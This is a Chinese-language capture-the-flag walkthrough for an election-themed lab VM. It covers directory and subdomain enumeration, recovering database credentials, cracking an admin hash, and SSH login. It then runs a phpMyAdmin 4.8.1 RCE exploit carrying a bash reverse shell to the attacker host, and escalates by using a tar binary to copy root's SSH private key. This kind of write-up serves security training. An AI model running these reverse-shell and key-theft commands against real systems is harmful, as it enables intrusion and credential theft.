描述

The Presidential Elections within the USA are just around the corner (November 2020). One of the political parties is concerned that the other political party is going to perform electoral fraud by hacking into the registration system, and falsifying the votes.

The state of Ontario has therefore asked you (an independent penetration tester) to test the security of their server in order to alleviate any electoral fraud concerns. Your goal is to see if you can gain root access to the server – the state is still developing their registration website but has asked you to test their server security before the website and registration system are launched.

This CTF was created and has been tested with VirtualBox. It should also be compatible with VMWare and is DHCP enabled.

Rating: Medium/Hard - Enumeration is your friend

存活

image-20221212105204428

1
2
kali 192.168.169.220
 靶机 192.168.169.230

靶机扫描

image-20221212105322733

1
端口 80 2082

访问

image-20221212105437599

目录扫描

1
gobuster dir -u http://192.168.169.230/   -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt  -x php,txt,html,js,php.bat.bak,zip,zip.bak

image-20221212105839105

about

image-20221212110038006

assets

image-20221212110201188

config

image-20221212110327916

  • 空白

dirsearch

image-20221212110733718

  • 发现另一个目录文件

image-20221212110821545

  • 还是空白 查看源代码有发现

image-20221212110900989

子域名

  • 首先 ip 域名添加到hosts

image-20221212111727735

1
wfuzz -H 'HOST: FUZZ.votenow.local' -u http://192.168.169.230/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt  --hw 854,45

image-20221212113024988

1
datasafe.votenow.local

image-20221212113621018

登录

1
2
3
4
5
6
7
8
9
<?php

$dbUser = "votebox";
$dbPass = "casoj3FFASPsbyoRP";
$dbHost = "localhost";
$dbname = "votebox";

?>

image-20221212115123831

image-20221212115321527

1
admin  $2y$12$d/nOEjKNgk/epF2BeAFaMu8hW4ae3JJk8ITyh48q97awT/G7eQ11i
  • 加密字段 使用john破解
1
echo '$2y$12$d/nOEjKNgk/epF2BeAFaMu8hW4ae3JJk8ITyh48q97awT/G7eQ11i' > hash 
1
john  --wordlist=/usr/share/wordlists/rockyou.txt hash
  • 因为破解时间较长,直接拿大佬的结果

image-20221212121428652

image-20221212122542465

1
Stella

ssh

1
ssh admin@192.168.169.230 -p 2082

image-20221212121635037

漏洞利用

image-20221212122317115

image-20221212122411274

  • 有一个phpMyAdmin 4.8.1 - Remote Code Execution (RCE)

image-20221212122519038

  • 查看利用文件,怎么试验都不行,最后看大佬把sessions改成session

image-20221212124028999

开始利用

  • 监听

image-20221212124255961

  • 使用漏洞文件,根据别人的例子跟着写

image-20221212124325589

1
python 50457.py datasafe.votenow.local 80 "" votebox casoj3FFASPsbyoRP "bash -c 'bash -i >& /dev/tcp/192.168.169.220/6666 0>&1'"

image-20221212124731542

  • 成功

提权

1
2
3
改一下交互

python -c 'import pty; pty.spawn("/bin/bash")'
  • 之前有用户和密码,切换一下用户,注意一下密码的大小写.

image-20221212125218743

image-20221212125413952

image-20221212125558432

1
2
3
4
5
6
7
8
9
cd ~
cat notes.txt
whereis tarS
ls -al /usr/bin/tarS

tarS -cvf key.tar /root/.ssh/id_rsa
tar -xvf key.tar
cd root/.ssh
ssh -i id_rsa root@localhost -p 2082

image-20221212130712603

image-20221212130746178